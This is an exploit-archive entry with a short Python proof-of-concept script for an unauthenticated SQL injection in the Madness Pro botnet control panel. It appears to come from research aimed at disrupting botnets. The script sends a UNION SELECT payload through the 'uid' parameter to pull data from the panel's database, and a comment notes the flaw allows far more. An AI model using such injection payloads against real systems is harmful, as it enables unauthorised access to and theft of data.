Madness Pro 1.14 SQL Injection

2014.06.07

Credit: @botnet_hunter

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# Exploit Title: Madness Pro <= 1.14 SQL injection
# Date: June 05, 2014
# Exploit Author: @botnet_hunter
# Version: 1.14
# Tested on: Apache2 - Ubuntu - MySQL
#
# Unauthenticated SQL injection in Madness Pro panel <= 1.14
# Proof of Concept retrieves a count of the bots, although it can be utilized for far more
# Discovered and developed by bwall @botnet_hunter
#
# References:
# http://blog.cylance.com/a-study-in-bots-lobotomy
#
import urllib
# Fill in URL that Madness Pro bot connects back to
panel_url = ""
def run_sqli_proof_of_concept(panel_index_url):
f = urllib.urlopen("{0}?uid='%20OR%201=2%20UNION%20ALL%20SELECT%201,1,1,CONCAT('bot-count:',COUNT(*))%20FROM%20bots"
"%20--%20--".format(panel_index_url))
print f.read()
run_sqli_proof_of_concept(panel_url)

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Madness Pro 1.14 SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.